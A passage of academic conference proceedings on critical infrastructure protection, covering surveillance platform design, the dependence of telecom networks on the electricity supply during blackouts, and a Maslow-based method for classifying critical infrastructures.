controls a portion of the infrastructure, and/or exercises a specific technology. The stakeholders, i.e., the people responsible for security and safety, communicate with all levels of this monitoring structure. Security personnel activities will be performed across the entire structure, on the base of routine and emergency process plans, and directed by an Operation and Control Center (OCC). In this respect, human-controlled activities will work as an orchestration of the Software Agents, whose autonomy will be greatly reduced, leaving people in complete control of the situation. People will be able to communicate with any level of the system, and to access all details of the awareness base. Advanced interfaces for mobile information supports. The instruments provided are grouped into a number of metaphorical tools, which are named here Newspaper, Agenda, Map, Telephone and TV. Flexible interface methods will properly port each logical instrument to the physical interaction device (mobile handset display, computer display, video monitor, wall panel display), accounting for their different sizes and interaction capabilities.
3
Intelligent Video Surveillance
Surveillance systems consist of three main elements: Data acquisition, Information analysis, and On-Field Operation. Large surveillance systems acquire data from hundreds of networked cameras. With an increasing number of cameras and other data sensors, Information Analysis becomes increasingly difficult. Human operators can easily get overwhelmed by a flood of unorganized visual information, and they may fail to effectively inform On-Field operations in an effective way. The use of conventional user interfaces and fixed video display matrices is no longer sufficient, due to the increasingly large scale and complexity of the information flow [16]. The available screen resources and operator attention needs to be empowered in a subtler, semantically richer and more interactive way [17]. Furthermore, today’s cutting edge surveillance systems perform very well [9] in relatively vacant environments. In an underpopulated scenario, people, vehicles and other objects can be easily tracked without a robust treatment of occlusions and of complex scene dynamics. However, as the monitored environment gets crowded, which is usually the case in transport infrastructures, these systems tend to fail and the accuracy and reliability of the surveillance systems dramatically deteriorate. The holonic architecture of our security platform is aimed at integrating the video surveillance in a way that will make the video surveillance an independent subsystem that can be implemented, modified or substituted by providing the integration, modification o substitution of interfaces to 3D modeling and knowledge base. Video surveillance subsystem shall permanently refer to the 3D model of the infrastructure, in order to be able to switch between the two representation as desired or useful (e.g., because of smoke, blackout, tracking a subject outside the camera field, etc.). Intelligent video surveillance subsystems capable of detecting and analyzing events and abnormal behaviors will work in a stand-alone mode and pass detected alerts to the knowledge base. The video
374
P. Assogna et al.
surveillance encoders will form a resilient inter-networked framework, fully and automatically redundant within itself, remotely managed and controlled. The video information originating from many sources will be distributed over the network to Operation Control Center (OCC) stations, equipped with video displays or desktop monitors, and simultaneously archived for offline analysis.
4
Automatic Generation of Digital 3D Models
Our geometric modeling and reasoning is based on BSP (Binary Space Partition) generated cellular decomposition of buildings from architectural plans. The paradigmatic reference is to PLM (Product Lifecycle Management), where geometric information provides the exchange/collaboration layer shared by all business departments and all product data. A fast semi-automatic solution was already experimented, and can be summarized as follows. Input line-drawings of 2D architectural plans are transformed into proper data structures, in order to answer proximity queries in an efficient way. Then semantics is assigned to small subsets of lines, via pattern-based recognition of the components of the building fabric (internal partitions, external enclosures, vertical communication elements, etc.), and subsequent translation into PLaSM scripts, i.e., symbolic generating forms. Later, the evaluation of symbolic scripts produces either streaming solid models at variable levels of detail or adjacency graphs of the critical infrastructure as a whole or of parts thereof [18]. To achieve our purpose we capitalized on a novel parallel technology [19,20] for high-performance solid and geometric modeling, that (i) compiles the generating expression of the model into a dataflow network of concurrent threads, and (ii) splits the model into fragments to be distributed among different computational nodes and independently generated. Progressive BSP trees are used by [20] for adaptive and parallelizable streaming dataflow evaluation of geometric expressions. They are associated to the polyhedral cells of the HPC (Hierarchical Polyhedral Complex) data structure used by the language. Hasse graphs are used to maintain a complete representation of topology.
5
Conclusion
The enormous size and complexity of modern surveillance scenarios generates a tremendous stream of data. The use of conventional user interfaces and fixed video display matrices appears no longer satisfactory, due to the increasingly large scale of the information flow. Therefore, the available screen estate and operator attention need to be empowered in subtler, semantically richer and interactive ways. To this end, advanced computer graphics and state-of-theart user interfaces are of paramount importance, where visual perception, 3D interactive computer graphics, Virtual Reality and Serious Games are closely integrated.
Critical Infrastructures as Complex Systems
375
References 1. Gell-Mann, M.: What is complexity? Complexity 1(1), 16–19 (1995) 2. Complex Systems Society (CSS), http://css.csregistry.org 3. Dooley, K.: A complex adaptive systems model of organization change. Nonlinear Dynamics, Psychology, & Life Science 1(1), 69–97 (1997) 4. Waldrop, M.M.: Complexity: The Emerging Science at the Edge of Order and Chaos. Simon & Schuster, New York (1993) 5. Hilaire, V., Koukam, A., Rodriguez, S.: An adaptive agent architecture for holonic multi-agent systems. ACM Trans. Auton. Adapt. Syst. 3(1), 1–24 (2008) 6. Koestler, A.: The ghost in the machine. Arkana, London (1967) 7. Keil, D., Goldin, D.: Indirect interaction in environments for multiagent systems. In: Weyns, D., Parunak, V., Michel, F. (eds.) E4MAS 2005. LNCS, vol. 3830, pp. 68–87. Springer, Heidelberg (2006) 8. Weyns, D., Van Dyke Parunak, H., Michel, F. (eds.): E4MAS 2006. LNCS, vol. 3830. Springer, Heidelberg (2006) 9. Koschan, A., Pollefeys, M., Abidi, M.: 3D Imaging for Safety and Security. Computational Imaging and Vision, vol. 35. Springer, New York (2007) 10. Finkenzeller, K.: RFID Handbook: Fundamentals and Applications in Contactless Smart Cards and Identification, 2nd edn. Wiley, Chichester (2003) 11. Rueda, L., Mery, D., Kittler, J. (eds.): CIARP 2007. LNCS, vol. 4756. Springer, Heidelberg (2007) 12. Howarth, R.J.: Spatial models for wide-area visual surveillance: Computational approaches and spatial building-blocks. Artif. Intell. Rev. 23(2), 97–155 (2005) 13. Paoluzzi, A.: Geometric Programming for Computer Aided Design. John Wiley & Sons, Chicester (2003) 14. Backus, J., Williams, J.H., Wimmers, E.L.: An introduction to the programming language FL. In: Research topics in functional programming, pp. 219–247. AddisonWesley Longman Publ., Boston (1990) 15. Aiken, A., Williams, J.H., Wimmers, E.L.: The FL project: The design of a functional language (1991) (unpublished report ) 16. Sebe, I.O., Hu, J., You, S., Neumann, U.: 3d video surveillance with augmented virtual environments. In: IWVS 2003: First ACM SIGMM international workshop on Video surveillance, pp. 107–112. ACM Press, New York (2003) 17. Girgensohn, A., Kimber, D., Vaughan, J., Yang, T., Shipman, F., Turner, T., Rieffel, E., Wilcox, L., Chen, F., Dunnigan, T.: DOTS: support for effective video surveillance. In: MULTIMEDIA 2007: Proceedings of the 15th international conference on Multimedia, pp. 423–432. ACM, New York (2007) 18. Paoluzzi, A., Scorzelli, G.: Pattern-driven mapping from architectural plans to solid models of buildings. In: Israel-Italy Bi-National Conf. on Shape Modeling and Reasoning for Industrial and Biomedical Appl., Haifa, Israel, Technion (2007) 19. Bajaj, C., Paoluzzi, A., Scorzelli, G.: Progressive conversion from B-rep to BSP for streaming geometric modeling. Computer-Aided Design and Applications 3(5(6)) (2006) 20. Scorzelli, G., Paoluzzi, A., Pascucci, V.: Parallel solid modeling using BSP dataflow. Journal of Computational Geometry and Applications 18(5), 441–467 (2008)
Challenges Concerning the Energy-Dependency of the Telecom Infrastructure Lothar Fickert1 , Helmut Malleck2 , and Christian Wakolbinger1 1
Dept. for Electrical Power Systems, Graz University of Technology, Inffeldgasse 18, A-8010 Graz, Austria
[email protected] http://www.ifea.tugraz.at/ 2 ¨ Project Management and Consulting in Telecommunications, OFEG, Arsenal Objekt 24, P.O. Box 147, A-1103 Wien, Austria
[email protected] Abstract. Industry worldwide depends on Information and Communication Technology (ICT). Through large-scale blackouts of the public electricity supply telephone services and Internet connections are massively reduced in their functions, leading to cascading effects. Following analysis of selected, typical failure situations countermeasures to re-establish the public electricity supply in Austria to consumers are identified. This can serve also as an example for other countries. Based on the existing public electricity supply system, a sensitivity analysis both in power and in the ICT sector for the mobile and the fixed network is carried out. As a new possible solution ”smart grid” or ”microgrids” and the controlled operation of decentralized stable islands are investigated. Keywords: Blackouts, interdependencies power and information infrastructure, sensitivity analysis, smart grid, decentralized generation, islanded operation.
1
Introduction
The infrastructure of the Information and Communication Technology (ICT) is due to technological developments subjected to an increasing dependency from the public electricity supply. The security of supply from the public electricity network requires that the supply chain: power producers - transportation network – distribution network – consumer must not be interrupted. Up to now there are no comprehensive studies concerning the criticality of the ICT infrastructure relating to the supply of electricity. There are further no coordinated approaches by the operators of public power supply networks towards the energy supply of critical ICT infrastructure. In the presented paper the sensitivities of the ICT infrastructure are identified and first proposals for handling power outages in the ICT sector for telecommunications companies and consumers are made. Weaknesses are identified and means to improve the situation presented. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 376–385, 2009. c Springer-Verlag Berlin Heidelberg 2009
Challenges Concerning the Energy-Dependency
2
377
Structures and Typical Fault Situations in Electrical Power Networks
The electrical energy usually flows from the power plants to consumers from the high voltage level networks (380 / 110-kV), via transformers into the regional medium voltage level networks (20-kV) and further on into local low-voltage grids [1] (see Figure 1).
Fig. 1. Technical structure of the public electricity supply
The most significant impairment of energy supply is caused by electrical faults, especially insulation faults. These are local disturbances and require the tripping of the faulty network element. Generally because of economic considerations the entire defective section is tripped out and the electricity supply is shut down for all connected consumers. The most common fault in power energy networks is usually the phase-to-earth fault: In 400-kV transmission networks and low voltage networks, it is because these networks usually have a low ohmic star point of ground connection. In these networks these faults lead to a forced shutdown of the network. In earthfault compensated medium voltage networks, as are common in Central Europe, it is possible to continue operation due to the small amount of fault local current, despite an existing phase-to-earth fault. However, in these networks often a single phase-to-earth fault leads to multiple cross-country faults. Then in any case the supply of electricity has to be shut down, which leads to blackouts in certain parts of the network.
378
L. Fickert, H. Malleck, and C. Wakolbinger
In contrast to these locally restricted disturbances so called large-scale disturbances represent another threat scenario. Mostly they originate from a not completely mastered disturbance in the high or very high voltage network and lead to large-scale power failures. A good example of this are weather commonmode failures as they were experienced in the recent cyclones Cyril and Paula, which led to major power disturbances [2]. If the network instability also affects generating units, the consequence is a slow step-by-step gradual overall system reconstruction. This requires that independent network operators and - also independent - power plant operators must act in a coordinated way. At present there is little practical experience on the operators side in solving major disturbances. Therefore it is generally assumed, in the case of large-scale disturbances the subsequent reconstruction times are in the range of several hours up to one or two days. In the European Standard EN 50160 ” Voltage Characteristics in Public Electricity Supply Networks” [3] it is stated as a characteristic of the delivered voltage that – ”supply voltage dips” (maximum duration: 1 minute, residual voltage: less than 90% of the contract voltage) may occur with a frequency from of up to a few tens to up to one thousand per year. – ”short interruptions of the supply voltage” (maximum duration: 3 minutes, residual voltage: less than 1% of the contract voltage) may occur with a frequency from up to a few tens to up to several hundreds per year. – ”long interruptions of the supply voltage” (duration longer than 3 minutes, residual voltage: less than 1% of the contract voltage) may occur with a frequency from less than 10 or up to 50 depending on the area. Blackouts affect entire regions and are rare events. There are no trustworthy statistics and no prediction models regarding frequencies and typical consumers downtime. Nevertheless it must be assumed that entire regions become deenergized - statistically speaking – once every 10 years with a downtime from 4 to 8 hours and in the worst case up to 48 hours. As fault statistics show the impact of disturbances in the medium and low voltage network afflict the consumers most seriously. Therefore, these distribution grids are examined in a more detailed way. The characteristics of these grids are the unidirectional load flow, the direct connection of the consumers to ring main units, the possibility to re-connect disturbed network sections by means of normally open circuit breakers or isolating switches and simple protection devices. The supply of consumers is mostly carried out by simple radial networks, where consumers (ring main units) are supplied with electric energy from the power source (main substation transformer) in a series connection. The advantage of this simple and transparent network structure is partly counterbalanced by the disadvantage that in the case of an electrical fault or other shutdown situations. This happens for example, if for repair purposes the flow of energy for the downstream consumer is interrupted. In a ring structured network, which is usually operated as a radial network, a line failure no longer leads necessarily to a longer lasting power failure. The
Challenges Concerning the Energy-Dependency
379
possibility to reclose a generally open circuit breaker or load isolating switch reestablishes the electricity supply to the consumers from another power supply source. It is desired to have such structures in medium voltage networks, but in low-voltage networks the possibility of a back-up supply is not generally common. The supply reliability is most effectively described by the UNIPEDE (International Union of Producerse and Distributors of elektrical Energie) approach by means of technical methods and the following measurable parameters – ASIDI Average System Interruption Duration Index . . . from the system viewpoint – SAIFI System Average Interruption Frequency Index . . . from the system viewpoint – CAIDI Customer Average Interruption Duration Index . . . from the individual customers viewpoint The average system interruption duration is already evaluated by most energy regulators and indicates in Austria with a value of 48 minutes for ASIDI top performance of the public networks. By means of this index one can calculate the individual interruption duration according to CAIDI =
ASIDI SAIF I
(1)
When the (usually small) annual system non-availability (ASIDI) is divided by the (also usually small) average system interruption frequency (SAIFI), one obtains the individual annual non-availability. The quotient may be quite high, at least compared to the average system outage time. Example: With an average system interruption duration of 48 minutes per year for Austria and an assumed failure rate of one fault in eight years (SAIF I = 18 · a−1 ) one obtains a representative individual customer interruption duration of 1 CAIDI = 48 min · a−1 · 1 −1 = 384 min = approximately 6.5 hours (2) 8 ·a This means that a representative consumer is – generally speaking - once every eight years without electrical power supply for a duration of approximately 6.5 hours on his part.
3
ICT Dependency on the Public Power Grid (PPG)
In the course of progress in Information and Communication Technology the dependencies on the public power grid give cause for concern. These dangers will be clarified in the following examination of the mobile and fixed networks and Internet Service Providers with respect to the ICT network topology [4].
380
3.1
L. Fickert, H. Malleck, and C. Wakolbinger
Mobile Networks
At first mobile networks will work on failure of the public electricity supply without interruption. However, base stations in containers or in those objects with integrated emergency batteries rented by network operators generally cannot bridge blackouts over the period of several hours. Base stations in buildings of intermediary agencies have significantly longer operating times in the case of power failure, with respect to the existing electricity grid replacement facility. Uninterrupted power supply facilities with emergency diesel engines also ensure that key network components with interfaces to other communications networks, so-called Mobile Switching Centers MSC, can ensure prolonged power output for several days. It is not clear, however, whether all mobile operators are aware of this situation. Mobile devices work, provided that the batteries are charged, for a certain length of time independent of the mains supply source. 3.2
Fixed Network
Mediation services in the fixed network and central institutions of the broadband connection technology work in case of failure of the public power supply initially without interruption. With the introduction of broadband technology the facilities located between the central office and the end user should also be considered. The power supply of these intermediary facilities situated in wall niches and on the roadside (Street Cabinets) is delivered from the central office by means of the now redundant, twisted pairs of the access line or directly on the spot from the public power grid. In the former case an emergency power supply is ensured. In the second case, as also in the case with the recently proposed reverse feeding from the end user, no functionality is generally possible when the public electricity network has a blackout. End user facilities such as cordless telephones, answer machines, home telephone systems, modems and PCs, require in general, the public electricity network in order to function. The power supply for the end users facilities through the access lines from the central office is no longer possible, because in comparison with conventional phones the modern machines have a significantly higher power consumption. Nowadays, many of the end user facilities are dependent on the quality of the electricity network. This will apply particularly after the introduction of the Next Generation Networks [5], with the outsourcing of switching intelligence to the end facilities at the edge of the network and clearly when the end user is connected via fibre optic cables. The user then has to provide the emergency power supply for his affiliated ICT devices himself. Uninterruptible power supply systems for private usage, in the agricultural sector and small and medium sized businesses often have small power capabilities and relatively short usage limits. Even if the power consumption of communication terminals, PCs and routers, etc. is relatively low, the emergency power supply times are not increasing at the same rate. Analyses of complete end-to-end connections with regard to the maintenance of communication relations in the case of partial or full failure of public electricity networks will be imperative.
Challenges Concerning the Energy-Dependency
3.3
381
Internet Service Provider
Nowadays ICT network access is operative and all the previously mentioned functions for the provision of emergency electricity are effective. But there remains the question of what possibilities exist to bridge power failures in the computer centres of the Internet Service Providers. Once more, in most cases, an uninterrupted continuation of the power supply systems using emergency diesel engines is foreseen. In the case of Web Server 2.0 the dependence on the single provider’s electrical capacity is reduced as the information can be transported via alternative packet switched routes.
4
Sensitivity Analysis
Blackouts of the public electricity supply can heavily restrict telephone and Internet connections in their functionality. A sensitivity analysis of both the mobile and the fixed networks will be initiated in order to answer or at least qualitatively estimate the question of what will happen with telephone and Internet access if the public electricity supply fails for hours or days. This will be based on the structure of public electricity supply, its disorders and their impact. The resulting impact on ICT, during and after blackouts will be generally analysed and in particular the impact on emergency situations. Ultimately, the end-to-end availability in heterogeneous communications networks with different service providers will be observed in order to consider the statements within the concept of ”best practice”. 4.1
Emergencies
The ability to contact state authorities or the emergency services (blue light organisations) is of paramount importance. People dependent on the functionality of their domestic emergency systems, such as pensioners and the disabled are particularly hard hit by power losses. If the local Voice over Internet Protocol (VoIP) adapter were to be disabled, no further emergency calls could be made. Only the ”ancient” cord bound telephones, with a power supply, centrally supplied over the connection make users independent in the case of failure of the locally available, public electricity network. For certain groups of users - such as emergency services - GSM specifications on principle contain possibilities allowing them preferential treatment in switching [6]. Emergency calls in mobile networks often are given priority. If no channel is free, an equivalent circuit made by an existing conversation is automatically separated in order to free the connection for the emergency call. For emergency calls with the international emergency number 112 an attempt to connect will be made as a priority if the sending mobile phone has a connection to a base station irrespective of which network operators are contracted to the phone. If however all the radio base stations achievable without power supply are inoperative after a short time, such measures are of no help. In order to clarify the capabilities of the mobile operators to secure and ensure accessibility to the emergency services further research is required.
382
L. Fickert, H. Malleck, and C. Wakolbinger
Emergency call centres, Public-Safety Answering Points (PSAPs) always demand 100% accessibility. This is for the most part enabled through uninterruptible power supply systems run on emergency diesel engines to bridge short and long power outages, switched on in the emergency situation. However, in the case of widespread power outages even PSAPs with uninterruptible power supply systems can be overloaded in their communication and power capacities by many general calls, generated by the current power outage situation. For small PSAPs telephone equipment will be connected directly to the emergency lines, but the computer system of the PSAP is normally no longer operational. Subsequent to widespread power outages a cascade effect can occur for the PSAPs because not only the normal volume, but also – through postponement the increased volumes – of the meanwhile accumulated calls should also be treated. The emergency services have often not been designed to handle these capacities, especially if the potential for reinforcement is not possible. Not only the dependence of individuals in our society on each other is high, owing to specialisation of labour. But also solidarity is in decline. Social relationships between individuals and social groups are becoming increasingly problematic and less satisfactory. The reliance on external support (state, blue light organisations) rises. Particularly at the event of large electricity disruptions, where the need for help increases, there is a strong perception of insecurity by the non-availability of these institutions. 4.2
Topology Comparison: PPG- vs. ICT-Topology
Many supply disruptions affect only parts of the electricity supply network, e.g. only one feeder in a radially structured network. In contrast to this in the course of a major blackout the entire public power supply is interrupted. The failure of a radial feeder means - geographically seen – a power failure in a supply area in one sector (rural supply) or in one corridor (urban supply). However, since the supply of the ICT facilities is structured differently (see Figure 2) and there are for this reason only random overlaps, in the case of a general supply disruptions, in a single circuit, the ICT are only very partially affected. To what extent by overlapping the edges of an ICT-range, coverage can be maintained, is the subject of further studies. A special case is the major blackout in which there is no possibility of maintaining a continuing supply from the edges of the coverage area. Here solutions are necessary, which allow a targeted energy supply to sensitive ICT customers. 4.3
Problem-Solving Potential of “Smart Grids” and “Smart Metering”
Even if in a heavily disturbed network small generation facilities such as cogeneration (Combined Heat and Power plants CHPs), small hydro power stations, etc., are still present and in operation, but they must trip out automatically despite their theoretical supply potential for islanded parts of the network. The reason for this operation mode lies in the fact that the supply of electricity under these
Challenges Concerning the Energy-Dependency
383
Fig. 2. Principle of the classic topology for fixed and mobile networks
circumstances leads in the present day situation to technically uncontrolled islands. In addition in this potentially dangerous operation mode there are threats arising from liability issues, endangering the network operators staff and even the general population. In recent years, under the term of “Smart Grid” or “Micro Grids” electrical networks have been designed and partially investigated. They incorporate a lot of communication between the network users. In these networks sophistication moves downwards the traditional hierarchical concept: Every node in the power network of the future will be awake, responsive, adaptive, price-smart, eco-sensitive, real-time, flexible, and interconnected with everything else. A very promising new technology to make the network more flexible on a low network level is the “Smart Metering” [7], [8]. The traditional electricity meters are replaced by intelligent remote terminal devices which additionally to their metering function can communicate at least with the network dispatching centre. In the event of a disaster the dispatching centre is in a position to determine the network situation in a much more detailed and precise way, compared to the past. The dispatching centre is enabled to re-construct stable network islands and to operate them by mean of fine-tuning the load according to the available energy (see Figure 3). Especially in the case of limited energy resources it is possible to localize individual interruptible customer groups for the purpose of load shedding. An even more sophisticated way to make best of limited energy is the limitation of the bulk of the consumers to vital energy applications like information and emergency lighting. By the technology of smart meters the limited, but still available energy is routed to the critical infrastructural applications, namely the ICT-nodes, in a reliable way.
384
L. Fickert, H. Malleck, and C. Wakolbinger
Fig. 3. Principle of a smart grid with smart meters to control limited energy flow Legend: 1. 2. 3. 4.
Defective high-level network Generator, decentralized generation Smart meter with disconnected load Smart meter with limited or unlimited load
In such networks it is expected in the event of a failure of the upstream level supply that controlled island operation can be maintained. There is at present no extensive experience yet with such decentralized stable islands. A general supply by means of these networks has to be studied in greater detail as an alternative to the presently exercised “area load shedding”.
5
Summary and Outlook
Ensuring the supply of electricity to ICT facilities serves to increase the safety of citizens. It allows them, despite large-scale disruption of the electricity supply, to obtain relevant information and - if necessary - to a contact state authorities or blue light-organizations. In this paper, the hazard potential for ICT facilities in the case of a failure in the public power supply are demonstrated and changes in the operation of the electrical networks, alterations in the ICT facilities and relevantly extended “Smart Grids” or “Micro Grids” are noted as potential solutions.
Challenges Concerning the Energy-Dependency
385
Technically possible and economically feasible solutions will include measures on the part of the electricity network suppliers (new equipment and changed operational management), measures concerning end user equipment and measures which combine both the network as well as the ICT side (combinations). This is carried out by the new technology of smart metering, i.e. special low voltage switching apparatus. By these meters the limited power is channelled to the critical ICT infrastructure. In conjunction with still functioning decentralised energy sources a potential emergency supply can be built up. Related issues include the fundamental involvement of legal clarifications. As investigations into reactive power breakdowns have already demonstrated, there are unresolved legal problems in the area of civil law. This means that technically feasible solutions on the side of the networks require additional clarification in the area of civil law.
References 1. Happolt, H., Oeding, D.: Elektrische Kraftwerke und Netze, 5th edn. Springer, Berlin (1978) 2. Schr¨ umpf, E.-G.: Stromausfall – und danach? e&i 125/5 (2008) 3. Voltage characteristics of electricity supplied by public distribution systems, Standard CENELEC EN50160:1994 4. Siegmund, G.: Technik der Netze, 5th edn., 2002. H¨ uthig Verlag, Heidelberg (2007) 5. Trends in Telecommunication reform 2007: the road to next generation networks (NGN) ITU (2007) 6. Mouly, M., Pautet, M.-B.: The GSM System for Mobile Communications (1992) 7. Siemens Power Transmission and Distribution, Energy Automation Division: 90026 N¨ urnberg, Information mit System, Best.-Nr. E50001-U330-A186 (2008) ¨ 8. Siemens Aktiengesellschaft Osterreich: AMIS Automated Metering and Information System, TD-3520/TASU30, Nr. M23-013-1.00 (2006)
An Effective Approach for Cascading Effects Prevision in Critical Infrastructures Luisa Franchina1 , Marco Carbonelli1 , Laura Gratta1 , Claudio Petricca1 , and Daniele Perucchini2 1
Critical Infrastructures experts, Italy 2 Fondazione Ugo Bordoni, Italy
Abstract. The recent dramatic experiences caused by natural or manmade disasters make mandatory to understand and manage the mutual dependency of those infrastructures that, if disrupted or destroyed, would seriously compromise our quality of life. Although many models have been developed to study particular contexts and single infrastructure sectors, a global strategy to represent and manage the complex issue of infrastructure dependency has not been deployed yet. This paper presents an heuristic approach that can be applied, on several different scales, to select Critical Infrastructures and to model dependencies, thus paving the way for cascading effects prevention and governance.
1
Introduction
Modern western countries have developed a model of society characterized by a high quality of life, meaning that basic services are available to citizens to let them express their attitudes at best, and to satisfy their needs. Examples of such services are energy provision, healthcare, transport, banking and finance. In the last years, dramatic experiences caused by natural or man-made disasters made urgent to understand the dependency of our society from those infrastructures that, if disrupted or destroyed, would seriously compromise our quality of life ([1], [2]). Single sectors of critical infrastructures have far back developed criteria to protect their assets. For example, in the ICT sector various best practices and standards are available in order to assess systems and infrastructures security ([3], [4]) and to design appropriate security measures. Nevertheless, this is not sufficient to guarantee end users against service interruptions; two considerations must be done: – modern critical infrastructures are strictly inter-connected; consequently, a binding analysis of interconnections is mandatory in order to achieve an effective preview of cascading effects; – some critical infrastructure operators rely on insurance contracts in order to guarantee business continuity, regardless of the actual availability of the service; this approach does not provide any guarantee for end users in terms of service continuity. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 386–393, 2009. c Springer-Verlag Berlin Heidelberg 2009
An Effective Approach for Cascading Effects Prevision
387
Based on these considerations, an intense activity in the international community has been undertaken. The USA, following the 9/11 events, deployed a detailed and organic national strategy for homeland protection, that entailed the creation of the Department of Homeland Security (DHS). In july 2002 DHS released the first version of the National Strategy for Homeland Security, that was updated up to the last version in july 2007 ([5]). One of the six critical mission areas identified in the strategy aims at protecting Critical Infrastructures and key assets. Within the EU, the Justice and Home Affairs (JHA) Council of june 2008 approved the text of the Directive on the identification and designation of European Critical Infrastructure and the assessment of the need to improve their protection. The approval of the Directive represents the final step of a normative path undertaken by the European Council of june 2004, asking the Commission to prepare a global strategy for the protection of Critical Infrastructures. The Directive lays out the measures established by the Commission in order to guarantee the correct operation of European Critical Infrastructures, i.e., those infrastructures the disruption or destruction of which would result in a significant impact on the quality of life of citizens in at least two Member States of the Union. In this paper, after a brief introduction on the problem of Critical Infrastructures (CI) protection, a methodology of classification and analysis of CIs is proposed. This methodology turns out to be useful to map the dependencies among different CIs, providing tools for the forecasting of cascading effects. This paper aims at providing flexible and effective instrument for the planning and coordination of prevision and prevention measures to safeguard citizens and Nations. Nevertheless, due to the fact that it does not require a high computational complexity it can be effectively employed both as an ex-ante instrument to prevent risks and as an ex-post tool to prioritize emergency interventions.
2
A Methodology to Classify Critical Infrastructures
In this section a methodology will be illustrated allowing to select and analyze Critical Infrastructures (CIs), meaning by this expression those assets, systems or parts thereof that are essential for the maintenance of vital social functions, health, security, safety, economic and social welfare of people, whose destruction or malfunctioning would have as a direct consequence a significant impact on population, as a result of a loss of service of these functions. 2.1
A sociologic Approach
The approach here introduced for the selection of CIs allows to perform in an organic way the analysis of CIs and their inter-dependencies, and to account for the peculiarities of the Nation the analysis refers to. The approach includes the following steps: – analysis of the primary needs of population; – selection of the resources necessary to satisfy the primary needs;
388
L. Franchina et al.
– analysis of every resource identified in step 2, to find out, according to predefined criteria and metrics, criticalities and dependencies. The use of a systematic statement of the population needs as a starting point in the selection of infrastructures provides rigour to the process itself, leading to an organic and complete overall picture. It is to be noted that the most common approaches ([5], [6], [7]) proceed by enumerating the critical sectors in an axiomatic way, without paying attention to the reasons why they are to be identified as critical and regardless of coherence among sector definitions to avoid overlaps or gaps. As a consequence, in many cases the selected sectors are not suitable for a detailed analysis of interdependencies among sectors and sub-sectors. With reference to step 1, the hierarchy of needs proposed by Maslow [8] is useful in order to select the primary needs. The primary needs of the individual are classified in five levels (Maslow’s Hierarchy), starting from the most elementary ones (necessary to survival) and reaching the most complex (sociological ones): Level 1: Physiological (hunger, thirst,...); Level 2: Safety and security; Level 3: Belonging (love, identification,...) Level 4: Self- esteem (achievement, success,...) Level 5: Self-actualization (fulfilment of expectations) The second step in the process consists in identifying the resources necessary to satisfy these basic needs. Tab.1 shows an example of the results of this process for a generic western country; the table shows, for each level of the hierarchy, the resources necessary to satisfy it. Table 1. Resources realizing the needs of Maslow hierarchy of needs (example) Level 1
Level 2
Food Water Energy Health Essential goods Environment
Transport Finance Non essential goods Communication Culture, icons, meeting places Information Public administration
Level 3
Level 4
It is to be noted that, based on Maslows approach, resources related to a given level of the hierarchy are not replicated in the levels above, since the satisfaction of the needs relevant to a given level understates the satisfaction of all the levels below. It can also be observed that no resource is listed in level 5. This is due to the fact that the needs relevant to this level have an introspective nature; they are not likely to be satisfied by means of external resources, but only by means of inner motivation. This classification is not sufficient to carry out an accurate analysis of dependancies; such level of abstraction is too high to analyse the complex dynamics linking resources. The proposed top-down classification is based on three distinct levels of abstraction: resources, items and components.
An Effective Approach for Cascading Effects Prevision
389
Fig. 1. Refinement of the basic needs and chain of generation
A resource is defined as an homogeneous conceptual area allowing to satisfy the needs of the population. For example, transport is a resource. An item defines a specific sub-area of a resource; it can be characterized by: – the service/product it delivers, if it is unique (for example, an item of the resource water is drinkable water); – the chain of generation (from row materials users fruition) it is made by, if it has at least one step separated from the chains of the other subsectors (for example, for the resource transport, the item rail transport will differ from the item road transport by virtue of their chain of generation). A resource usually includes several distinct items. For example, the items of the resource transport could be: road transport, air transport, rail transport, maritime transport, inland water transport. A component represents a phase in the chain of generation that, starting from the processing of row materials composing the item, leads to its fruition by the end user. The components of the chain are the production, transport, distribution and fruition, as shown in Fig.1, and defined below: – production: collection and processing of raw materials, up to the creation of the item itself; – transport: transfer of the item from the production site to the freight routing; it includes shipment and stocking; – distribution: delivering of the item from the stocking site to the end user; it also includes, at local level, stocking and distribution; – use: possibility for the user to get the product/service according to defined quality parameters and congruous rates; this phase includes retail and service provision to end users. The chain of generation paradigm can be applied to all the selected items: in some cases one or more steps (e.g.: transport and distribution) will be missing; anyway, an item can always be thought of as service/product together with the various components of its generation. It is worth noting that, in more specific sectoral analyses, it could be necessary to split the single components in further detailed elements, that can coincide with the assets of the infrastructure. In the following we apply the described approach, representing, as an example, the resources necessary to satisfy basic needs in a general Western Country. Tab.2 shows a possible structured classification in resources and items. This table can
390
L. Franchina et al. Table 2. Resources and items classification
Resource Food Water Energy Health Environment Transport Communication Information Public Administration Finance Culture, icons, meeting places Essential goods Non essential goods
Item Perishable food, Un-perishable food Drinkable water, Irrigation water Electric energy, Gas, Fuel, Wood, Coal Health service, Medicines and sanitary aids, Emergency services Dangerous sites security, Environment protection, Drainage water Rail, Air, Road, Maritime(sea, river) Data exchange on Internet, Telephony Satellite and Postal services Broadcasting, publishing, Internet information National and local institutions, Public security, Justice Services to population (licences, authorizations,etc), Defense Financial transaction, Stock exchange Education, Preservation of icons and heritage, Cultural/Artistic assets, safety of meeting places
further be refined with sector specific skills. This will provide a suitable basis to proceed with the dependencies and cascading effects analysis.
3
Criticality Criteria
Up to now we identified a classification of infrastructures (resources, items, components, elements). Anyway, whichever is the classification method adopted, to point out critical infrastructures it is necessary to apply a criticality criteria to set a threshold of criticality. To this aim, different approaches can be adopted, for example: – Ex-ante consequence evaluation approach:this approach evaluates on an exante basis the potential effects of a disruption or a destruction of an infrastructure. The approach implies to set up predefined thresholds for each parameter (for example, the number of fatalities or injuries, the economic loss and the impact on public confidence) and consistent measurement methods. Such kind of approach was followed, for example, in the EU directive [6]; – Ex-post dynamic approach:based on the quality and amount of emergency services needed to face the crisis and overpass it; this approach is adopted by the Italian civil protection, that defines three increasingly critical kinds of events on this base. In particular, the Italian approach defines a bottom-up methodology in which an event that affects an infrastructure can be classified from local (municipal level), to regional level or to national level (managed by the Civil Protection Department). This criterion applies the subsidiarity principle; – Ex-ante needs approach : based on Maslow levels, the criticality can be related to the hierarchical level of the needs they satisfy. This approach can be adopted typically as a first pre-selection criterion in the identification
An Effective Approach for Cascading Effects Prevision
391
